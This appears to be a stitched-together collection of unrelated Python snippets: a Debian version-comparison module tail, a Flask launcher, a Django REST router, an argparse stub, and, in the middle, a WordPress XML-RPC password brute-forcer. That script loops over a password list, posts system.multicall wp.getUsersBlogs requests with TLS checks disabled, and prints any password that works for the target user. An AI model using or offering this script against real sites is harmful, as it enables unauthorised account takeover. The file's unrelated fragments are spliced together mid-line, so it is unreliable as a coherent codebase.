'.join(map(str, self.repos))
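# A minimal usage sketch for the version / requirement classes defined above.
# The package names and versions are made up; building a Repo or RepoSet needs
# network (or filesystem) access to a real APT-style repository, so that part
# is only sketched in comments.
if __name__ == '__main__':
    assert DebianVersion('1:2.0-1') > DebianVersion('1.9-3')    # epoch dominates
    assert DebianVersion('1.0~rc1') < DebianVersion('1.0')      # '~' sorts before the release
    assert VersionReq('>= 1.2').satisfied_by('1.2-1')

    req = PkgReq('openssh-server (>= 7.0) | dropbear')
    print(req.names)   # {'openssh-server', 'dropbear'} (a set, so order may vary)

    # repos = RepoSet([Repo('https://repo.example.org', dist='stable', comp='main')])
    # pkg = repos.satisfy_req('some-package (>= 1.0)')
    # if pkg is not None:
    #     pkg.download()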
# -*- coding: utf-8 -*- #from tst import testUnitarios from src import Controlador import unittest import os #runner = unittest.TextTestRunner() #result = runner.run(unittest.makeSuite(testUnitarios.TestUnitarios)) port = int(os.environ.get('PORT', 5000)) Controlador.app.run(threaded=True, host='0.0.0.0', port=port)
""" Acme URL's """ # Django from django.urls import include, path # Django REST Framework from rest_framework.routers import DefaultRouter # Views from root.Acme.api.views import CategoryViewSet, ProductViewSet, OrdersViewSet, OperationsViewSet router = DefaultRouter(trailing_slash=False) router.register(r"categories", CategoryViewSet, basename="categories") router.register(r"products", ProductViewSet, basename="products") router.register(r"orders", OrdersViewSet, basename="orders") router.register(r"operations", OperationsViewSet, basename="operations") app_name = "Acme" urlpatterns = [ # API path("", include(router.urls)), ]
#!/usr/bin/python ''' ''' from __future__ import print_function import urllib2 import sys import ssl if len(sys.argv) < 3: exit('Error: not enough arguments. Usage...') url = sys.argv[1] pwfile = sys.argv[2] user = sys.argv[3] # read in list of passwords with open(pwfile, 'r') as f: pwlist = f.read().splitlines() # construct XML for RPC POST request for pw in pwlist: data = "<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>%s</string></value><value><string>%s</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>" % (user, pw) # create SSL request if needed ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # post request try: req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'}) rsp = urllib2.urlopen(req,context=ctx) except urllib2.HTTPError as e: print(e.code) except urllib2.URLError as e: print(e.reason) else: content = rsp.read() # checks for either 'Incorrect' or 'isAdmin' keywords # note that the isAdmin does not ensure that the user # is a wordpress admin... the boolean flag might be 0 if 'Incorrect' in content: print('.', end='') sys.stdout.flush() elif 'isAdmin' in content: print("\nPassword found for user: \n\t - username: %s\n\t - password: %s" % (user,pw)) exit()
import argparse


def main(args=None):
    parser = argparse.ArgumentParser()
    # TODO: add an "init" subparser covering both platform-style packages and
    # simple packages.


if __name__ == '__main__':
    main()
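# A hedged sketch of what the TODO above could grow into: an "init" subcommand
# that distinguishes a platform-style package from a simple one. The program
# name, subcommand and option names are illustrative, not an existing CLI.
def build_parser():
    parser = argparse.ArgumentParser(prog="pkgtool")
    subparsers = parser.add_subparsers(dest="command")
    init = subparsers.add_parser("init", help="initialise a new package")
    init.add_argument("name", help="package name")
    init.add_argument("--platform", action="store_true",
                      help="create a platform-style package instead of a simple one")
    return parser


# Example: build_parser().parse_args(["init", "demo", "--platform"])
# -> Namespace(command='init', name='demo', platform=True)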